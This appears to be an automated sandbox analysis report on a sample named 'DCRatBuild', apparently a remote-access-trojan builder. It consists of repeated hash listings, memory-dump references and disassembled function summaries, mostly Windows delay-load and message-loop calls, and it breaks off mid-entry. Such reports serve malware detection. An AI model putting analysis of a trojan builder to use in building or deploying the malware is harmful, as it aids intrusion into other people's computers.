Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: a8d70cdc47c33083120693753c97fa6e883bab197bf9a319249069e07eb3fc36
Instruction ID: 4d64564aee76084d1c8c4067a51affcc516776c6d322bbcfee1f899f1e295f60
Opcode Fuzzy Hash: a8d70cdc47c33083120693753c97fa6e883bab197bf9a319249069e07eb3fc36
Instruction Fuzzy Hash: F5D01231021140B58F2146354D190997F65EB83376B38D7A9D0A5C41A1D733C803F541

Function 008ED41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 008ED43F

Part of subcall function 008EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008EAC85
Part of subcall function 008EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008EAC96
Part of subcall function 008EAC74: IsDialogMessageW.USER32(00010494,?), ref: 008EACAA
Part of subcall function 008EAC74: TranslateMessage.USER32(?), ref: 008EACB8
Part of subcall function 008EAC74: DispatchMessageW.USER32(?), ref: 008EACC2

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 01361af0951e0b09110b247392bb95bce555b1be2dbcc31356cc44189196ab4d
Instruction ID: a99541fe726636b714f7d0e74ff581d06e7ed4a60e816e1b2f80f0d1f99f69a2
Opcode Fuzzy Hash: 01361af0951e0b09110b247392bb95bce555b1be2dbcc31356cc44189196ab4d
Instruction Fuzzy Hash: 16D09E31258300ABD6152B51CE06F0F7AA6FB88B04F004654B745B40F2CA62AD20FF16

Function 008ED891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2fff82e1b545c43f4d320aec8620e7fb9bda0f85c17db952fbd4677550a13b96
Instruction ID: f6c9361adc4642d2f55aea01d8634ae3285b91c47cb55a0aaeb5fb4d40a0d436
Opcode Fuzzy Hash: 2fff82e1b545c43f4d320aec8620e7fb9bda0f85c17db952fbd4677550a13b96
Instruction Fuzzy Hash: 10B012E526C3427C31086246BD62C3B020CD4C2B14730493AB40DE00C0D8805C4C4832

Function 008ED8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 10514ecb92fa97d6808f802ce74c7ac5e43cc50dfa9a048364675ffabbc56a63
Instruction ID: de2f23cddd57870aa22c85454105c7a80a3096ac1e3d00f598eeca9f4fd5de07
Opcode Fuzzy Hash: 10514ecb92fa97d6808f802ce74c7ac5e43cc50dfa9a048364675ffabbc56a63
Instruction Fuzzy Hash: 20B012E526C3466C3108A24AAD52D3B024CF4C2B14730443AB40DD01C0D9405C0C0932

Function 008ED8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 372282521f116d3b7b1d1903ea624528b94f0aa59c525226f12395511f2de129
Instruction ID: 189e0541d61ca7b56183c0ec1bb101b2a238bc4b0c541ba451911b844a6260c2
Opcode Fuzzy Hash: 372282521f116d3b7b1d1903ea624528b94f0aa59c525226f12395511f2de129
Instruction Fuzzy Hash: 71B012E126C3426C3108A24AAD12D36024CD4C3B14730C42AB40DD02C0D8405C0D0832

Function 008ED8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1cf6f1b101951b4c4f59aee00f30b75e5de414905f19f89780876e993deb9106
Instruction ID: c023dc17a609250b1d054dff750361e06dce9ce925f7c21c4674b86770be99d8
Opcode Fuzzy Hash: 1cf6f1b101951b4c4f59aee00f30b75e5de414905f19f89780876e993deb9106
Instruction Fuzzy Hash: 46B012E126C3426C310CA24BAE12D36024CD4C2B14730842AB00DD02C0D8405C0E1832

Function 008ED8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 78f0d932ac3a655f2955f402e34ac429cd5966c768c24086c87bc5dc54dd47fd
Instruction ID: bef3a3f10077fd701f53461176e59bdf6ec18ca03279d3ee81f476ffe51fe780
Opcode Fuzzy Hash: 78f0d932ac3a655f2955f402e34ac429cd5966c768c24086c87bc5dc54dd47fd
Instruction Fuzzy Hash: 0AB012E126C3866C3148A24ABD12D36024CD4C2B14730852AB00DD02C0D8805C8D0832

Function 008ED8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 91935f3af37a3c4d5d75e5f847f46e6ff740ed9557c699560246124efff9c749
Instruction ID: c786a137fd19ac5553b3068c24289065ae11080660d8ff847e0e9b389e798c0c
Opcode Fuzzy Hash: 91935f3af37a3c4d5d75e5f847f46e6ff740ed9557c699560246124efff9c749
Instruction Fuzzy Hash: 36B012F126C3426C3108A24AAD12D37025CD4C3B14730842AB40DD01C0D8405C0C0832

Function 008ED8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 875915e7b06f810e1ef9e3fc5246a042f5f33959e790972e39ce3b42675ed14d
Instruction ID: 72c71f5b8b0bebc02a5dc2aedc580a71c566acb9c9393894a3422328d37d3b1a
Opcode Fuzzy Hash: 875915e7b06f810e1ef9e3fc5246a042f5f33959e790972e39ce3b42675ed14d
Instruction Fuzzy Hash: 87B012F126C3426C3148A24ABD12D37025CD4C3B14730452AB00DD01C0D8805C4C0832

Function 008ED8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 48a7691b76ff3da49307369ce14928511f54b951c6c31186c443b3ddc8e6ecfe
Instruction ID: 7bd5d11cb168c5bc9fcc53d666eb7a6107c76e3e3485831fac9c23a631c692c0
Opcode Fuzzy Hash: 48a7691b76ff3da49307369ce14928511f54b951c6c31186c443b3ddc8e6ecfe
Instruction Fuzzy Hash: 8CB012F126C3426C310CA24BAD12D37025CE4C3B14730442AB00DD01C0D8405C0C0832

Function 008ED8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4f5d3ac2a4ec8747dcabae78196239195e76fb8d589cda027ba052b598d6ca35
Instruction ID: 311ca0d117a4cc06c83e4a8517c3e1229121d51a67f1cf2591d766efa7612b8a
Opcode Fuzzy Hash: 4f5d3ac2a4ec8747dcabae78196239195e76fb8d589cda027ba052b598d6ca35
Instruction Fuzzy Hash: 13B012F126C3426C310CA24AAE12D37025CD4C3B14730442AB00DD01C0D8405D0D1832

Function 008ED906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3c7e06ff114ef4378eca8cf24fcdcdd21f845596d763b3232a57690efec76bb0
Instruction ID: 2b5019c85b1e29c91343ca95fd993f87ca362ebb4d4c75c94150ff306b82fd3e
Opcode Fuzzy Hash: 3c7e06ff114ef4378eca8cf24fcdcdd21f845596d763b3232a57690efec76bb0
Instruction Fuzzy Hash: A3B012E136D3426C3108A24AAD12D36024DD4C3B14B30842AB50DD01C0D8405C0C0832

Function 008ED910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d5a912ae523fb24e5dc72698a45da1e495a979e1a9544a12f1a483dd8dc05a0f
Instruction ID: 84ea015a8b9d49cf8b9faf67ffe6e82db632adb2d9ea10049c6f2a9bd73ff842
Opcode Fuzzy Hash: d5a912ae523fb24e5dc72698a45da1e495a979e1a9544a12f1a483dd8dc05a0f
Instruction Fuzzy Hash: 3CB012F126D3426C3148A34ABD12D36024DD4C2B14B30452AB10DD01C0D8805C4C0832

Function 008ED92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2461f886c29fabe298586b0e20a75711bb19aaf5bdc83b393e780f997810a8d3
Instruction ID: f6cbb9a296cdba326a0270630e554689fe7859adeefe77a498b56136399f2c88
Opcode Fuzzy Hash: 2461f886c29fabe298586b0e20a75711bb19aaf5bdc83b393e780f997810a8d3
Instruction Fuzzy Hash: 08B012E126C3426C3108A25AAD12D36028CD4C3B18730842AF50DD01C0D9405C0C0832

Function 008ED924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 541f2e38e963445ce6cfc6387c426c695387dd1c3f8a12de616fba0e6482282f
Instruction ID: 93fa96fb9fe12d5dfb5ac87fb4b27483bda21ea23d0ca73ca7c45679e1a7417e
Opcode Fuzzy Hash: 541f2e38e963445ce6cfc6387c426c695387dd1c3f8a12de616fba0e6482282f
Instruction Fuzzy Hash: ACB012E127D3426C3108A24AAD12D36028DE8C2B14B30442AB14DD01C0D8405C0C0832

Function 008ED942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dcbabefd2ad8ca7ad66bfcd5db3ac69312226120a8e7d7414340d18a9dd08565
Instruction ID: 0391ad9e646a423e612981c584c0d6728eafb3f30ab6a221a9cc07555ccf0793
Opcode Fuzzy Hash: dcbabefd2ad8ca7ad66bfcd5db3ac69312226120a8e7d7414340d18a9dd08565
Instruction Fuzzy Hash: 6AB012F126C3426C310CA24AAE12D3602CCD4C2B18B30442AF00DD01C0D9405C0D1832

Function 008EDACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c58b65c7f8d0404303682f9bbf01a7288bc9a63fa10c4ae2e444ca984694ca0
